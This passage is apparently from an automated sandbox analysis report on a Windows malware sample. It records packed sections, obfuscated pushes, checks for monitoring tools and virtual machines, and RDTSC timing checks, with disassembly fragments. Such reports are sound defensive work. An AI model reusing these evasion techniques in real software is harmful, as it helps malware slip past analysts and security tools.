tProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001468F0
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1ce583 should be: 0x1c9bf3
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: sqwnkuay
              Source: file.exeStatic PE information: section name: dlrscmkp
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0055E055 push 5D2BB893h; mov dword ptr [esp], edi | 0_2_0055E0B9
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0059105A push edi; mov dword ptr [esp], 5125D435h | 0_2_005910A9
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054A84A push ecx; mov dword ptr [esp], 21BF876Ah | 0_2_0054A8A8
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054A84A push 4BCB2200h; mov dword ptr [esp], edi | 0_2_0054A8C5
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0039D826 push ebx; mov dword ptr [esp], 0BD5F953h | 0_2_0039D860
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005BD07A push 7E3D28EFh; mov dword ptr [esp], ebx | 0_2_005BD0DC
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0058B00B push ecx; mov dword ptr [esp], esi | 0_2_0058B04B
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0051680B push 208F5800h; mov dword ptr [esp], edx | 0_2_00516869
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0051680B push esi; mov dword ptr [esp], ebx | 0_2_00516877
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0051680B push eax; mov dword ptr [esp], ebp | 0_2_0051689B
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0051680B push ebx; mov dword ptr [esp], eax | 0_2_005168F3
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005AE033 push edx; mov dword ptr [esp], ebp | 0_2_005AE059
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005AE033 push 1FA75021h; mov dword ptr [esp], esp | 0_2_005AE061
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005FA021 push edi; mov dword ptr [esp], 5CFC5FC0h | 0_2_005FA071
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005FA021 push edi; mov dword ptr [esp], edx | 0_2_005FA0D2
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003DB8B5 push esi; mov dword ptr [esp], ebp | 0_2_003DB8E3
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003DB8B5 push 16DFF2F6h; mov dword ptr [esp], ecx | 0_2_003DB9E4
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003DB8B5 push edi; mov dword ptr [esp], 5ACEF69Eh | 0_2_003DB9F0
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003DB8B5 push ebp; mov dword ptr [esp], ebx | 0_2_003DBA57
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003DB8B5 push 56536839h; mov dword ptr [esp], ecx | 0_2_003DBAF5
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003DB8B5 push edx; mov dword ptr [esp], esp | 0_2_003DBB06
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005698C7 push ebx; mov dword ptr [esp], 5DDDE856h | 0_2_005698F2
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005698C7 push 395424EFh; mov dword ptr [esp], eax | 0_2_005699BA
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005698C7 push eax; mov dword ptr [esp], ebx | 0_2_00569A14
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005698C7 push 347CC05Dh; mov dword ptr [esp], eax | 0_2_00569A44
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005698C7 push ebx; mov dword ptr [esp], 6D029486h | 0_2_00569AB0
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005698C7 push 2884809Ch; mov dword ptr [esp], eax | 0_2_00569AC7
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005698C7 push 2B4FD541h; mov dword ptr [esp], ebx | 0_2_00569AF5
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F50D6 push 596EBC39h; mov dword ptr [esp], edx | 0_2_004F555F
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005BA0B8 push 741A0D23h; mov dword ptr [esp], ecx | 0_2_005BA20C
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0047A8AB push ebx; mov dword ptr [esp], ecx | 0_2_0047A9DD
              Source: file.exe | Static PE information: section name: sqwnkuay entropy: 7.954864550900061

              Boot Survival

              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A324 second address: 52A341 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CBCE6B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A341 second address: 52A359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B9CB0EC14h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52AD36 second address: 52AD3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52AA75 second address: 52AA7F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2B9CB0EC06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52AD3A second address: 52AD7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a sbb edi, 72BEB172h 0x00000010 push 00000000h 0x00000012 mov di, DD00h 0x00000016 movsx esi, ax 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007F2B9CBCE6A8h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 xchg eax, ebx 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52AA7F second address: 52AA85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52AD7A second address: 52AD7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52AA85 second address: 52AA89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52AD7E second address: 52AD88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52AD88 second address: 52AD8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52AD8C second address: 52ADAC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2B9CBCE6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jbe 00007F2B9CBCE6BEh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F2B9CBCE6ACh 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B847 second address: 52B861 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B9CB0EC16h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B861 second address: 52B8C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CBCE6B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F2B9CBCE6A8h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 push 00000000h 0x0000002a mov si, bx 0x0000002d push 00000000h 0x0000002f xchg eax, ebx 0x00000030 jmp 00007F2B9CBCE6B7h 0x00000035 push eax 0x00000036 push esi 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D322 second address: 52D328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D328 second address: 52D32C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D32C second address: 52D343 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CB0EC13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531F8F second address: 531FA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jnl 00007F2B9CBCE6A6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532763 second address: 532767 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532767 second address: 532771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534564 second address: 53456E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2B9CB0EC0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53456E second address: 534582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2B9CBCE6ABh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534582 second address: 53460B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CB0EC11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a movzx ebx, ax 0x0000000d push esi 0x0000000e push edx 0x0000000f mov dword ptr [ebp+122D32F5h], ebx 0x00000015 pop ebx 0x00000016 pop edi 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007F2B9CB0EC08h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 0000001Ah 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 mov edi, dword ptr [ebp+122D302Bh] 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ebp 0x0000003e call 00007F2B9CB0EC08h 0x00000043 pop ebp 0x00000044 mov dword ptr [esp+04h], ebp 0x00000048 add dword ptr [esp+04h], 00000018h 0x00000050 inc ebp 0x00000051 push ebp 0x00000052 ret 0x00000053 pop ebp 0x00000054 ret 0x00000055 jmp 00007F2B9CB0EC13h 0x0000005a xchg eax, esi 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 popad 0x00000061 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53460B second address: 534611 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532771 second address: 5327F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F2B9CB0EC08h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 mov edi, dword ptr [ebp+122D3975h] 0x00000028 push dword ptr fs:[00000000h] 0x0000002f mov dword ptr [ebp+122DBBE7h], edi 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c xor bh, FFFFFF80h 0x0000003f mov eax, dword ptr [ebp+122D0421h] 0x00000045 mov dword ptr [ebp+1247F3C3h], esi 0x0000004b push FFFFFFFFh 0x0000004d push 00000000h 0x0000004f push ebp 0x00000050 call 00007F2B9CB0EC08h 0x00000055 pop ebp 0x00000056 mov dword ptr [esp+04h], ebp 0x0000005a add dword ptr [esp+04h], 0000001Ah 0x00000062 inc ebp 0x00000063 push ebp 0x00000064 ret 0x00000065 pop ebp 0x00000066 ret 0x00000067 jne 00007F2B9CB0EC0Ch 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 push eax 0x00000071 pushad 0x00000072 popad 0x00000073 pop eax 0x00000074 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5337C9 second address: 5337D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53651B second address: 536526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536526 second address: 53652A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53652A second address: 5365DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CB0EC0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jc 00007F2B9CB0EC1Dh 0x00000011 jng 00007F2B9CB0EC17h 0x00000017 jmp 00007F2B9CB0EC11h 0x0000001c nop 0x0000001d jl 00007F2B9CB0EC0Ch 0x00000023 sub dword ptr [ebp+1246C049h], ebx 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007F2B9CB0EC08h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 0000001Bh 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 mov edi, ecx 0x00000047 mov dword ptr [ebp+122D17F6h], ebx 0x0000004d push 00000000h 0x0000004f push 00000000h 0x00000051 push ebp 0x00000052 call 00007F2B9CB0EC08h 0x00000057 pop ebp 0x00000058 mov dword ptr [esp+04h], ebp 0x0000005c add dword ptr [esp+04h], 0000001Bh 0x00000064 inc ebp 0x00000065 push ebp 0x00000066 ret 0x00000067 pop ebp 0x00000068 ret 0x00000069 jmp 00007F2B9CB0EC0Bh 0x0000006e mov dword ptr [ebp+122DBC18h], edi 0x00000074 sub ebx, dword ptr [ebp+122D2BF5h] 0x0000007a xchg eax, esi 0x0000007b push eax 0x0000007c push edx 0x0000007d push eax 0x0000007e jno 00007F2B9CB0EC06h 0x00000084 pop eax 0x00000085 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53388C second address: 533899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jng 00007F2B9CBCE6ACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534763 second address: 534777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B9CB0EC0Fh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534777 second address: 534781 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2B9CBCE6ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5366F5 second address: 5366FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F2B9CB0EC06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53AC46 second address: 53AC61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F2B9CBCE6A6h 0x0000000a popad 0x0000000b push ebx 0x0000000c jns 00007F2B9CBCE6A6h 0x00000012 pop ebx 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53AC61 second address: 53AC65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53AC65 second address: 53AC6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5357DD second address: 5357E2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53CAB3 second address: 53CB0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007F2B9CBCE6ACh 0x0000000c push ecx 0x0000000d jnl 00007F2B9CBCE6A6h 0x00000013 pop ecx 0x00000014 popad 0x00000015 nop 0x00000016 adc edi, 31FF4FF7h 0x0000001c push 00000000h 0x0000001e mov dword ptr [ebp+122D1B9Bh], ebx 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ecx 0x00000029 call 00007F2B9CBCE6A8h 0x0000002e pop ecx 0x0000002f mov dword ptr [esp+04h], ecx 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc ecx 0x0000003c push ecx 0x0000003d ret 0x0000003e pop ecx 0x0000003f ret 0x00000040 xchg eax, esi 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jp 00007F2B9CBCE6A6h 0x0000004a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53CB0F second address: 53CB13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53AE2E second address: 53AE34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53AE34 second address: 53AE3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F2B9CB0EC06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53DB7E second address: 53DB82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53DB82 second address: 53DB88 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53DB88 second address: 53DB97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B9CBCE6ABh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53DB97 second address: 53DB9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53BCCF second address: 53BCD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53EBC7 second address: 53EBCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53BCD4 second address: 53BCF6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F2B9CBCE6B6h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53EBCD second address: 53EBD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53BCF6 second address: 53BCFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53CC76 second address: 53CC7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53DDCB second address: 53DDCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53EF02 second address: 53EF12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B9CB0EC0Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53EF12 second address: 53EF16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53FEB8 second address: 53FEBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 540F89 second address: 540F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 540F8D second address: 540FA8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2B9CB0EC10h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542F0A second address: 542F14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5430E7 second address: 5430EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549EB0 second address: 549EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F2B9CBCE6B2h 0x0000000a pushad 0x0000000b jmp 00007F2B9CBCE6B9h 0x00000010 jnc 00007F2B9CBCE6A6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54CB6A second address: 54CB8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F2B9CB0EC06h 0x0000000a popad 0x0000000b jmp 00007F2B9CB0EC18h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54CB8D second address: 54CB92 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54FBF2 second address: 54FC07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B9CB0EC11h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55586B second address: 55586F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55586F second address: 55587F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F2B9CB0EC06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55587F second address: 555883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556641 second address: 556668 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CB0EC0Ah 0x00000007 push eax 0x00000008 ja 00007F2B9CB0EC06h 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jmp 00007F2B9CB0EC0Ch 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556668 second address: 556677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007F2B9CBCE6A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
